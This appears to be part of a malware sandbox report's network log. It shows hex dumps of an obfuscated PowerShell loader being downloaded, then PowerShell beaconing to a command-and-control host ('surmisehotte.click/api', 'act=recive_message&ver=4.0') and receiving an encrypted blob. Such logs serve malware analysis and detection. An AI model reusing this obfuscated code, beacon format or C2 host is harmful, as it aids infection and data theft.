                                                                      2024-12-24 07:29:11 UTC1369INData Raw: 6d 58 6b 62 63 6c 56 79 53 70 77 0d 0a 7d 0d 0a 28 28 28 24 72 53 42 71 6e 53 6c 6b 4f 66 2d 33 2d 28 24 50 77 4d 54 53 43 76 73 2d 33 39 2d 24 51 55 56 4d 4c 78 6b 49 68 43 74 29 2d 28 28 32 32 2b 34 33 2d 31 31 29 29 29 29 29 20 0d 0a 7b 0d 0a 24 63 7a 49 58 74 52 72 79 58 57 4b 64 6d 55 20 3d 20 31 34 30 0d 0a 24 57 65 72 44 54 69 6b 41 4b 6d 62 4a 72 20 3d 20 24 76 48 58 71 55 59 79 63 0d 0a 7d 0d 0a 64 65 66 61 75 6c 74 20 7b 28 28 28 28 33 36 2b 31 2b 33 32 29 29 29 2a 32 31 2b 31 36 2d 28 38 2a 31 36 2b 34 31 29 2d 28 28 33 39 2d 31 31 2a 33 30 29 29 2d 28 31 35 37 39 29 29 7d 0d 0a 7d 24 5a 74 76 6d 6c 20 3d 20 34 35 31 0d 0a 24 74 6b 48 52 6e 52 43 70 78 20 3d 20 28 28 28 33 38 2b 34 35 2b 34 34 2d 28 28 31 2d 32 32 2a 32 36 2b 28 34 32 2d 33 35
                                                                      Data Ascii: mXkbclVySpw}((($rSBqnSlkOf-3-($PwMTSCvs-39-$QUVMLxkIhCt)-((22+43-11))))) {$czIXtRryXWKdmU = 140$WerDTikAKmbJr = $vHXqUYyc}default {((((36+1+32)))*21+16-(8*16+41)-((39-11*30))-(1579))}}$Ztvml = 451$tkHRnRCpx = (((38+45+44-((1-22*26+(42-35
                                                                      2024-12-24 07:29:11 UTC1369INData Raw: 4b 57 56 7a 52 29 2b 24 54 78 70 6b 4b 75 6c 66 6f 6e 5a 2d 38 2d 33 38 29 29 29 2d 28 33 30 31 29 29 0d 0a 24 4a 42 69 61 77 43 6c 6d 58 4f 49 68 6a 6f 20 3d 20 28 28 35 2d 36 2b 24 4f 72 4a 6d 70 45 4e 2b 28 24 57 47 4c 5a 55 2b 36 2b 28 24 4e 4d 45 47 52 6f 2b 32 39 2b 39 29 29 29 2d 28 34 37 32 29 29 0d 0a 24 42 67 79 52 64 76 4d 54 49 73 45 6b 20 3d 20 28 28 28 28 24 55 48 58 46 59 2d 31 2b 24 54 78 70 6b 4b 75 6c 66 6f 6e 5a 29 29 2b 28 28 35 2b 34 2d 24 6c 42 43 54 5a 4c 63 73 77 76 72 53 77 29 29 29 2d 28 34 30 2d 33 33 2d 31 29 2d 28 32 35 29 29 0d 0a 24 73 67 45 52 79 74 70 20 3d 20 28 28 28 28 24 63 7a 49 58 74 52 72 79 58 57 4b 64 6d 55 2d 36 2d 35 29 29 29 2b 28 28 32 39 2b 31 39 2b 33 32 29 29 2b 28 32 37 2b 34 33 2d 24 4a 72 4f 67 46 75 76
                                                                      Data Ascii: KWVzR)+$TxpkKulfonZ-8-38)))-(301))$JBiawClmXOIhjo = ((5-6+$OrJmpEN+($WGLZU+6+($NMEGRo+29+9)))-(472))$BgyRdvMTIsEk = (((($UHXFY-1+$TxpkKulfonZ))+((5+4-$lBCTZLcswvrSw)))-(40-33-1)-(25))$sgERytp = (((($czIXtRryXWKdmU-6-5)))+((29+19+32))+(27+43-$JrOgFuv
                                                                      2024-12-24 07:29:11 UTC1369INData Raw: 4b 77 47 4e 55 4c 4d 20 3d 20 28 28 28 24 7a 79 51 67 67 2d 34 35 2d 33 30 2b 24 57 65 72 44 54 69 6b 41 4b 6d 62 4a 72 2d 33 35 2d 28 24 42 58 6c 47 45 54 53 4f 59 2d 32 2d 24 51 61 53 6e 56 50 62 70 4a 77 55 53 66 2d 28 28 31 36 2d 34 34 2b 24 48 50 61 73 42 47 59 7a 78 64 59 62 56 29 29 2d 34 34 2b 34 38 2b 34 36 29 29 29 2d 28 31 33 39 29 29 0d 0a 24 4b 50 6f 6b 78 44 65 53 52 42 5a 66 73 4a 20 3d 20 28 28 28 31 36 2b 32 35 2b 34 36 29 29 2d 24 6c 42 43 54 5a 4c 63 73 77 76 72 53 77 2b 32 39 2b 32 2b 28 34 31 2b 32 39 2d 28 24 52 5a 54 67 6b 43 41 70 49 53 59 2b 33 33 2d 34 35 29 29 2b 28 33 38 36 29 29 0d 0a 24 53 62 75 5a 4d 63 6a 61 20 3d 20 28 28 28 28 24 49 79 62 63 44 68 47 6d 6a 54 2b 34 33 2d 28 33 34 2d 39 2d 28 24 67 52 6b 49 4d 44 5a 66 64
                                                                      Data Ascii: KwGNULM = ((($zyQgg-45-30+$WerDTikAKmbJr-35-($BXlGETSOY-2-$QaSnVPbpJwUSf-((16-44+$HPasBGYzxdYbV))-44+48+46)))-(139))$KPokxDeSRBZfsJ = (((16+25+46))-$lBCTZLcswvrSw+29+2+(41+29-($RZTgkCApISY+33-45))+(386))$SbuZMcja = (((($IybcDhGmjT+43-(34-9-($gRkIMDZfd
                                                                      2024-12-24 07:29:11 UTC1369INData Raw: 28 24 48 43 53 70 72 66 77 4b 61 41 2d 33 35 2b 24 52 5a 54 67 6b 43 41 70 49 53 59 29 2b 31 36 2b 31 38 2d 24 55 48 58 46 59 29 2b 28 32 36 2d 32 33 2d 24 6b 57 67 68 4f 74 75 5a 78 6e 53 65 68 51 29 2b 28 28 32 38 2d 31 32 2d 33 35 29 29 29 2b 28 37 32 36 29 29 0d 0a 24 54 6d 41 7a 55 79 75 72 4b 78 20 3d 20 28 28 33 39 2b 37 2d 31 29 2b 28 24 6b 58 5a 74 71 52 61 2b 31 33 2d 28 24 4b 68 63 6e 45 4c 58 2b 33 2b 24 6b 57 67 68 4f 74 75 5a 78 6e 53 65 68 51 2b 24 44 74 57 65 68 67 6f 77 49 6e 2b 34 2b 31 37 29 29 2b 28 36 38 34 29 29 0d 0a 24 41 6e 65 63 66 4d 4a 69 79 6a 4f 6d 56 20 3d 20 28 28 24 55 73 66 4b 6f 71 50 6a 54 4e 2b 31 37 2d 33 29 2b 32 39 2d 31 2d 28 33 2d 31 37 2b 28 34 31 2d 33 39 2d 28 34 30 2b 33 2d 34 34 29 29 29 2d 28 35 38 30 29 29
                                                                      Data Ascii: ($HCSprfwKaA-35+$RZTgkCApISY)+16+18-$UHXFY)+(26-23-$kWghOtuZxnSehQ)+((28-12-35)))+(726))$TmAzUyurKx = ((39+7-1)+($kXZtqRa+13-($KhcnELX+3+$kWghOtuZxnSehQ+$DtWehgowIn+4+17))+(684))$AnecfMJiyjOmV = (($UsfKoqPjTN+17-3)+29-1-(3-17+(41-39-(40+3-44)))-(580))
                                                                      2024-12-24 07:29:11 UTC1369INData Raw: 5b 69 6e 74 5d 24 48 79 70 47 6c 65 66 6b 62 62 72 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 65 6c 4f 6a 6e 4d 79 63 50 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 54 6d 41 7a 55 79 75 72 4b 78 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 41 6e 65 63 66 4d 4a 69 79 6a 4f 6d 56 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 44 71 4d 4b 7a 46 53 54 73 58 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 59 42 54 76 53 55 6a 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 4a 4a 45 54 51 50 53 4c 4d 6b 29 0d 0a 0d 0a 24 4c 54 48 6e 53 4b 52 45 75 58 42 20 3d 20 38 36 0d 0a 24 74 54 6a 50 6d 64 49 79 7a 20 3d 20 28 28 28 28 31 32 2b 33 32 2a 32 30 29 29 2b 28 32 39 2b 39 2b 28 31 30 2b 38 2d 38 29 29 2d 31 32 2d 31 37 2b 34 39 2d 28 31 39 39 29 29 29 0d 0a 24 48 50
                                                                      Data Ascii: [int]$HypGlefkbbr + [char][int]$elOjnMycP + [char][int]$TmAzUyurKx + [char][int]$AnecfMJiyjOmV + [char][int]$DqMKzFSTsX + [char][int]$YBTvSUj + [char][int]$JJETQPSLMk)$LTHnSKREuXB = 86$tTjPmdIyz = ((((12+32*20))+(29+9+(10+8-8))-12-17+49-(199)))$HP
                                                                      2024-12-24 07:29:11 UTC1369INData Raw: 64 6d 55 20 3d 20 31 34 30 0d 0a 24 57 65 72 44 54 69 6b 41 4b 6d 62 4a 72 20 3d 20 24 76 48 58 71 55 59 79 63 0d 0a 7d 0d 0a 64 65 66 61 75 6c 74 20 7b 28 28 28 28 33 36 2b 31 2b 33 32 29 29 29 2a 32 31 2b 31 36 2d 28 38 2a 31 36 2b 34 31 29 2d 28 28 33 39 2d 31 31 2a 33 30 29 29 2d 28 31 35 37 39 29 29 7d 0d 0a 7d 24 5a 74 76 6d 6c 20 3d 20 34 35 31 0d 0a 24 74 6b 48 52 6e 52 43 70 78 20 3d 20 28 28 28 33 38 2b 34 35 2b 34 34 2d 28 28 31 2d 32 32 2a 32 36 2b 28 34 32 2d 33 35 2b 31 36 29 29 29 29 2d 28 36 35 31 29 29 29 0d 0a 24 44 74 57 65 68 67 6f 77 49 6e 20 3d 20 28 28 28 33 2b 32 38 2a 28 31 35 2b 34 39 2b 37 29 2a 31 38 2b 31 31 2d 28 32 2b 32 39 2d 33 39 29 29 2d 28 33 35 35 34 35 29 29 29 0d 0a 62 72 65 61 6b 0d 0a 7d 24 4b 68 63 6e 45 4c 58 20
                                                                      Data Ascii: dmU = 140$WerDTikAKmbJr = $vHXqUYyc}default {((((36+1+32)))*21+16-(8*16+41)-((39-11*30))-(1579))}}$Ztvml = 451$tkHRnRCpx = (((38+45+44-((1-22*26+(42-35+16))))-(651)))$DtWehgowIn = (((3+28*(15+49+7)*18+11-(2+29-39))-(35545)))break}$KhcnELX
                                                                      2024-12-24 07:29:11 UTC192INData Raw: 29 2d 28 34 37 32 29 29 0d 0a 24 42 67 79 52 64 76 4d 54 49 73 45 6b 20 3d 20 28 28 28 28 24 55 48 58 46 59 2d 31 2b 24 54 78 70 6b 4b 75 6c 66 6f 6e 5a 29 29 2b 28 28 35 2b 34 2d 24 6c 42 43 54 5a 4c 63 73 77 76 72 53 77 29 29 29 2d 28 34 30 2d 33 33 2d 31 29 2d 28 32 35 29 29 0d 0a 24 73 67 45 52 79 74 70 20 3d 20 28 28 28 28 24 63 7a 49 58 74 52 72 79 58 57 4b 64 6d 55 2d 36 2d 35 29 29 29 2b 28 28 32 39 2b 31 39 2b 33 32 29 29 2b 28 32 37 2b 34 33 2d 24 4a 72 4f 67 46 75 76 49 44 29 2d 24 42 58 6c 47 45 54 53 4f 59 2d 37 2b 28 33 39 2b 33 36 2b 34 38 29 2b 28 37 31
                                                                      Data Ascii: )-(472))$BgyRdvMTIsEk = (((($UHXFY-1+$TxpkKulfonZ))+((5+4-$lBCTZLcswvrSw)))-(40-33-1)-(25))$sgERytp = (((($czIXtRryXWKdmU-6-5)))+((29+19+32))+(27+43-$JrOgFuvID)-$BXlGETSOY-7+(39+36+48)+(71


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.649958104.21.64.14436648C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-12-24 07:30:54 UTC265OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 8
                                                                      Host: surmisehotte.click
                                                                      2024-12-24 07:30:54 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                      Data Ascii: act=life
                                                                      2024-12-24 07:30:55 UTC1135INHTTP/1.1 200 OK
                                                                      Date: Tue, 24 Dec 2024 07:30:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=96fk1gedhvivmnjvdpbj8qrnua; expires=Sat, 19 Apr 2025 01:17:34 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4OCQ%2F5bYeLo02Afhwu2gy8oA3Rj%2Bj4pe4TVRbUGqv3CmGAUoxQ2wUCRE4ud3jL9tpHRj7umcTOGTm47%2F2rLASZSE7t%2BdV7inX4Yyo1%2B2PyoU6bn3Lj4gz7maUdWLFN%2Bg%2B6kIZTg%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8f6ee3871e967c6c-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1990&min_rtt=1940&rtt_var=829&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1244671&cwnd=189&unsent_bytes=0&cid=affac2b31b2e90bb&ts=755&x=0"
                                                                      2024-12-24 07:30:55 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                      Data Ascii: 2ok
                                                                      2024-12-24 07:30:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.649964104.21.64.14436648C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-12-24 07:30:56 UTC266OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 48
                                                                      Host: surmisehotte.click
                                                                      2024-12-24 07:30:56 UTC48OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 36 26 6a 3d
                                                                      Data Ascii: act=recive_message&ver=4.0&lid=yJEcaG--singl6&j=
                                                                      2024-12-24 07:30:57 UTC1138INHTTP/1.1 200 OK
                                                                      Date: Tue, 24 Dec 2024 07:30:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=ebfpuv4ch1faqaprq97u7tud59; expires=Sat, 19 Apr 2025 01:17:36 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q80uFqRuw904jc%2FuCizAL0dj5lYkwWbTop3MKcHMSkn5IcomG4xnB%2Bu0wBlT1kgNaSZV%2BBA5G%2FQR8xylQ9CKOG%2B2HKaXKums4xU1YGf%2FHLN%2FalZIhm6t4TROFHjFyqPd%2FtoRzyU%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8f6ee3937f288c93-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1849&min_rtt=1841&rtt_var=707&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=950&delivery_rate=1530398&cwnd=192&unsent_bytes=0&cid=40a396c40654edb6&ts=1060&x=0"
                                                                      2024-12-24 07:30:57 UTC231INData Raw: 34 39 31 63 0d 0a 47 45 4a 71 42 6a 41 79 56 6e 65 70 34 6b 77 6c 66 75 49 67 34 4d 6a 65 73 46 54 74 67 31 49 78 2f 76 62 36 6a 31 50 56 48 77 70 6a 59 42 77 6b 43 67 5a 36 56 64 71 48 62 68 38 4b 6b 46 57 46 35 50 7a 52 4d 4d 2b 35 4e 46 43 53 68 5a 2b 6a 63 61 4e 79 4b 43 49 6b 43 32 70 44 56 33 70 56 7a 4a 70 75 48 79 57 5a 41 6f 57 6d 2f 49 70 32 69 4f 6b 77 55 4a 4b 55 6d 2b 51 38 70 58 4e 70 63 43 34 4e 62 6c 56 52 4d 68 62 46 6a 79 6c 41 47 34 4e 4b 6a 71 47 7a 32 44 6e 50 72 33 42 55 68 4e 54 41 72 52 36 77 61 32 74 56 49 78 6c 74 45 6b 39 36 44 49 75 48 49 67 64 45 77 45 47 46 71 72 4c 57 4d 49 62 72 4f 6c 6d 61 6c 5a 37 6c 49 37 78 35 59 6e 41 67 44 6d 39 66 57 43 59 62 7a
                                                                      Data Ascii: 491cGEJqBjAyVnep4kwlfuIg4MjesFTtg1Ix/vb6j1PVHwpjYBwkCgZ6VdqHbh8KkFWF5PzRMM+5NFCShZ+jcaNyKCIkC2pDV3pVzJpuHyWZAoWm/Ip2iOkwUJKUm+Q8pXNpcC4NblVRMhbFjylAG4NKjqGz2DnPr3BUhNTArR6wa2tVIxltEk96DIuHIgdEwEGFqrLWMIbrOlmalZ7lI7x5YnAgDm9fWCYbz
                                                                      2024-12-24 07:30:57 UTC1369INData Raw: 34 67 69 52 68 47 44 41 73 7a 71 75 38 70 32 31 36 46 6a 59 5a 2b 46 69 66 67 38 70 33 73 6f 5a 57 34 52 4a 46 56 63 64 45 32 4c 69 43 4a 4a 47 59 4e 4e 68 61 75 38 77 44 6d 50 34 6a 68 62 6d 4a 36 58 34 6a 36 35 64 32 39 79 4b 51 39 72 56 56 67 79 47 73 6a 41 59 41 63 62 6d 41 4c 61 36 70 7a 43 4e 59 7a 31 50 55 4c 63 69 39 62 30 63 62 42 78 4b 43 4a 67 44 6d 70 54 58 54 51 48 77 34 73 6c 51 67 36 4c 53 34 2b 6e 76 4e 38 38 67 4f 49 77 56 4a 61 65 6c 2b 63 31 75 6e 42 75 65 69 42 49 4b 68 4a 58 4c 46 57 54 77 41 31 43 44 49 64 4f 6c 4f 69 47 6b 69 6e 42 2b 48 42 55 6b 4e 54 41 72 54 6d 79 66 6d 74 78 4c 77 74 73 57 55 49 30 42 38 32 4e 4b 31 55 61 68 55 79 49 71 61 37 59 4f 49 6e 69 4f 56 69 56 6b 5a 2f 70 63 66 6b 39 62 32 4a 67 55 43 52 7a 58 54 38 5a
                                                                      Data Ascii: 4giRhGDAszqu8p216FjYZ+Fifg8p3soZW4RJFVcdE2LiCJJGYNNhau8wDmP4jhbmJ6X4j65d29yKQ9rVVgyGsjAYAcbmALa6pzCNYz1PULci9b0cbBxKCJgDmpTXTQHw4slQg6LS4+nvN88gOIwVJael+c1unBueiBIKhJXLFWTwA1CDIdOlOiGkinB+HBUkNTArTmyfmtxLwtsWUI0B82NK1UahUyIqa7YOIniOViVkZ/pcfk9b2JgUCRzXT8Z
                                                                      2024-12-24 07:30:57 UTC1369INData Raw: 59 57 6b 6c 43 43 70 71 37 65 50 49 6e 75 50 56 2f 63 32 74 6a 71 4b 66 63 6c 4b 46 41 6a 48 47 64 59 45 67 45 57 78 59 34 70 55 56 79 66 44 4a 76 71 75 39 35 32 31 36 45 39 55 70 53 53 69 75 49 38 74 48 4e 6d 64 53 55 48 62 46 4a 51 4f 52 44 50 69 79 56 45 45 59 52 51 69 4b 71 30 31 7a 65 46 36 33 41 64 33 4a 4f 41 72 57 6e 33 54 48 39 78 59 6a 31 6e 58 46 34 7a 41 34 75 66 59 46 35 63 68 30 37 43 38 76 7a 66 50 6f 72 6b 50 31 4b 57 6d 70 33 6e 50 62 39 7a 61 32 67 76 44 47 52 65 57 44 34 59 78 59 51 6d 54 68 65 4c 52 49 4b 72 74 70 4a 34 7a 2b 59 6f 45 38 54 55 72 4f 6f 39 75 6e 49 71 54 79 4d 47 61 6c 56 47 64 41 71 46 6d 57 35 41 45 4d 41 61 77 71 61 31 30 6a 32 46 35 54 42 55 6b 5a 47 62 36 6a 4b 36 65 6d 4a 30 4a 77 78 6f 57 31 30 79 46 63 79 45 4b
                                                                      Data Ascii: YWklCCpq7ePInuPV/c2tjqKfclKFAjHGdYEgEWxY4pUVyfDJvqu95216E9UpSSiuI8tHNmdSUHbFJQORDPiyVEEYRQiKq01zeF63Ad3JOArWn3TH9xYj1nXF4zA4ufYF5ch07C8vzfPorkP1KWmp3nPb9za2gvDGReWD4YxYQmTheLRIKrtpJ4z+YoE8TUrOo9unIqTyMGalVGdAqFmW5AEMAawqa10j2F5TBUkZGb6jK6emJ0JwxoW10yFcyEK
                                                                      2024-12-24 07:30:57 UTC1369INData Raw: 61 77 71 47 4a 33 43 44 50 2f 6e 35 4b 33 4a 4f 55 72 57 6e 33 64 47 46 6f 4c 67 5a 74 58 31 59 38 45 73 57 4e 4a 55 45 58 68 30 57 45 70 37 54 66 4d 34 7a 67 4e 46 6d 4f 6c 35 50 6e 50 4c 30 39 4a 6a 6f 6e 45 43 51 4b 45 42 4d 5a 34 70 41 31 56 51 72 41 58 63 79 7a 2f 4e 55 36 7a 37 6c 77 55 4a 4f 64 6c 2b 55 35 75 48 4a 73 64 43 59 4f 61 56 64 66 50 67 66 44 6a 69 4e 4d 45 34 74 51 67 71 65 34 33 6a 4b 48 36 6a 6f 54 30 74 53 66 39 58 48 76 50 56 31 33 4c 77 68 6e 52 42 41 72 57 39 4c 41 4b 55 74 63 32 41 4b 4f 70 4c 7a 64 4f 6f 50 71 4f 46 4b 51 6d 70 2f 6f 4f 4c 39 31 65 6e 73 6b 41 47 56 63 58 7a 55 52 7a 6f 55 71 51 42 69 47 54 63 4c 6b 2f 4e 55 75 7a 37 6c 77 66 4c 75 68 32 73 77 4c 39 32 49 6d 59 32 41 50 61 42 49 49 64 42 6e 49 6a 43 5a 49 47 6f
                                                                      Data Ascii: awqGJ3CDP/n5K3JOUrWn3dGFoLgZtX1Y8EsWNJUEXh0WEp7TfM4zgNFmOl5PnPL09JjonECQKEBMZ4pA1VQrAXcyz/NU6z7lwUJOdl+U5uHJsdCYOaVdfPgfDjiNME4tQgqe43jKH6joT0tSf9XHvPV13LwhnRBArW9LAKUtc2AKOpLzdOoPqOFKQmp/oOL91enskAGVcXzURzoUqQBiGTcLk/NUuz7lwfLuh2swL92ImY2APaBIIdBnIjCZIGo
                                                                      2024-12-24 07:30:57 UTC1369INData Raw: 35 4a 49 38 68 4f 55 7a 56 35 6d 62 6d 65 77 33 70 58 70 68 61 43 34 46 61 31 70 59 50 52 54 50 68 53 4e 42 45 49 70 44 68 61 53 79 32 6e 62 42 6f 54 64 4c 33 4d 7a 59 7a 43 47 73 62 33 35 33 41 51 56 72 45 6b 39 36 44 49 75 48 49 67 64 45 77 45 75 51 72 72 48 41 50 34 6a 76 50 31 43 4f 6c 5a 58 6d 49 37 42 79 62 48 30 73 44 6d 74 55 55 54 45 66 78 34 63 72 54 42 4f 4d 41 73 7a 71 75 38 70 32 31 36 45 65 57 49 2b 44 6d 2b 4d 36 6f 57 59 6f 5a 57 34 52 4a 46 56 63 64 45 32 4c 67 79 56 4d 47 49 42 4f 67 71 36 78 30 69 53 41 35 6a 64 61 6c 34 61 53 36 6a 61 38 64 57 4e 31 4a 68 70 6f 58 45 49 78 42 39 6e 41 59 41 63 62 6d 41 4c 61 36 6f 72 56 4a 70 2f 69 63 6d 4b 4b 6c 34 37 6d 50 4c 73 39 64 7a 51 35 53 47 4e 65 45 47 78 56 7a 59 38 6e 52 42 4f 42 53 34 36
                                                                      Data Ascii: 5JI8hOUzV5mbmew3pXphaC4Fa1pYPRTPhSNBEIpDhaSy2nbBoTdL3MzYzCGsb353AQVrEk96DIuHIgdEwEuQrrHAP4jvP1COlZXmI7BybH0sDmtUUTEfx4crTBOMAszqu8p216EeWI+Dm+M6oWYoZW4RJFVcdE2LgyVMGIBOgq6x0iSA5jdal4aS6ja8dWN1JhpoXEIxB9nAYAcbmALa6orVJp/icmKKl47mPLs9dzQ5SGNeEGxVzY8nRBOBS46
                                                                      2024-12-24 07:30:57 UTC1369INData Raw: 74 65 68 43 46 69 53 70 70 76 32 63 61 67 7a 63 54 6f 6e 42 43 51 4b 45 44 63 53 79 49 45 6b 54 68 43 50 52 59 61 34 74 74 55 6b 6a 75 41 37 58 70 43 55 6c 65 41 37 74 6e 52 6c 64 69 30 50 59 31 31 56 64 46 75 4c 68 7a 59 48 52 4d 42 6a 6a 36 47 77 69 57 7a 50 2f 6e 35 4b 33 4a 4f 55 72 57 6e 33 66 57 4a 2f 4b 67 56 6e 58 56 4d 6d 46 4d 32 53 4c 6b 6f 57 6b 6b 69 4a 72 37 48 66 4f 34 7a 6e 4e 6c 69 51 68 70 48 74 4d 72 77 39 4a 6a 6f 6e 45 43 51 4b 45 42 63 43 33 59 6f 70 53 77 71 4c 51 34 47 38 73 63 4a 32 77 61 45 68 56 49 33 55 77 50 73 68 6f 48 70 33 4e 44 6c 49 59 31 34 51 62 46 58 4e 69 53 68 41 47 6f 35 51 68 36 79 7a 33 54 2b 47 35 54 68 51 6e 4a 43 63 36 6a 53 30 63 57 4e 39 49 77 64 67 57 31 34 39 47 6f 76 4f 62 6b 41 45 77 42 72 43 69 36 66 52
                                                                      Data Ascii: tehCFiSppv2cagzcTonBCQKEDcSyIEkThCPRYa4ttUkjuA7XpCUleA7tnRldi0PY11VdFuLhzYHRMBjj6GwiWzP/n5K3JOUrWn3fWJ/KgVnXVMmFM2SLkoWkkiJr7HfO4znNliQhpHtMrw9JjonECQKEBcC3YopSwqLQ4G8scJ2waEhVI3UwPshoHp3NDlIY14QbFXNiShAGo5Qh6yz3T+G5ThQnJCc6jS0cWN9IwdgW149GovObkAEwBrCi6fR
                                                                      2024-12-24 07:30:57 UTC1369INData Raw: 46 42 6e 35 33 59 6f 33 47 77 5a 53 67 69 59 43 68 76 52 46 55 7a 41 34 6d 31 4c 55 6b 53 68 31 54 43 74 59 4f 63 64 6f 44 37 63 41 75 6c 6a 64 6a 71 50 66 63 6c 4b 47 38 6e 43 47 4e 49 52 6a 4d 5a 32 6f 73 6a 53 7a 36 50 52 5a 53 70 73 39 45 6e 68 71 30 37 58 74 7a 61 32 4f 6f 70 39 79 55 6f 56 53 63 65 5a 33 31 54 4a 52 79 4c 7a 6d 35 41 43 73 41 61 77 70 54 38 77 44 57 66 34 6a 39 43 6f 74 54 41 39 41 2f 33 64 6e 35 39 4d 41 74 79 57 56 30 34 42 50 58 41 64 68 4e 4f 30 68 44 51 2b 4b 4f 53 4b 62 43 76 63 46 4c 63 7a 4b 48 30 63 61 45 39 4d 43 68 75 53 48 59 53 43 48 52 53 79 4a 49 38 51 52 2b 57 51 63 57 55 67 76 55 67 68 65 59 67 56 49 75 62 32 4b 4e 78 75 44 30 77 51 32 41 42 59 30 6c 42 49 68 6a 62 68 32 35 34 55 73 42 61 77 76 4c 38 35 7a 57 42 37
                                                                      Data Ascii: FBn53Yo3GwZSgiYChvRFUzA4m1LUkSh1TCtYOcdoD7cAuljdjqPfclKG8nCGNIRjMZ2osjSz6PRZSps9Enhq07Xtza2Oop9yUoVSceZ31TJRyLzm5ACsAawpT8wDWf4j9CotTA9A/3dn59MAtyWV04BPXAdhNO0hDQ+KOSKbCvcFLczKH0caE9MChuSHYSCHRSyJI8QR+WQcWUgvUgheYgVIub2KNxuD0wQ2ABY0lBIhjbh254UsBawvL85zWB7
                                                                      2024-12-24 07:30:57 UTC1369INData Raw: 47 6e 75 34 6e 74 44 70 57 52 43 45 46 61 78 35 65 50 78 58 4d 6b 44 68 63 55 49 68 42 6d 4c 43 43 37 42 32 44 35 7a 64 4a 6d 35 4b 2b 7a 58 48 35 50 57 63 36 65 44 45 6b 47 68 41 4c 57 34 75 59 62 68 39 63 74 55 47 4d 70 4c 76 45 4a 38 4c 4a 45 32 6d 6d 31 72 54 71 4a 50 56 4a 62 32 6f 78 41 32 6c 65 45 48 70 56 7a 63 42 32 46 31 4c 41 52 70 50 71 35 49 4a 6b 31 4c 52 6a 42 4d 7a 47 68 36 4d 6f 39 32 73 6f 49 6e 4a 47 4a 45 41 51 62 46 57 4d 67 7a 78 56 47 6f 4e 55 67 65 32 43 37 42 47 42 35 6a 46 46 6a 49 4f 58 30 77 2b 69 66 6d 5a 30 4a 78 35 31 45 68 35 30 47 6f 76 59 46 77 64 55 77 48 33 4d 36 71 53 53 62 73 2f 55 4d 31 32 53 6b 34 37 38 66 4a 42 7a 62 33 73 32 47 48 4e 64 45 48 70 56 7a 63 42 32 46 56 4c 41 52 70 50 71 35 49 4a 6b 31 4c 52 6a 42 4d
                                                                      Data Ascii: Gnu4ntDpWRCEFax5ePxXMkDhcUIhBmLCC7B2D5zdJm5K+zXH5PWc6eDEkGhALW4uYbh9ctUGMpLvEJ8LJE2mm1rTqJPVJb2oxA2leEHpVzcB2F1LARpPq5IJk1LRjBMzGh6Mo92soInJGJEAQbFWMgzxVGoNUge2C7BGB5jFFjIOX0w+ifmZ0Jx51Eh50GovYFwdUwH3M6qSSbs/UM12Sk478fJBzb3s2GHNdEHpVzcB2FVLARpPq5IJk1LRjBM
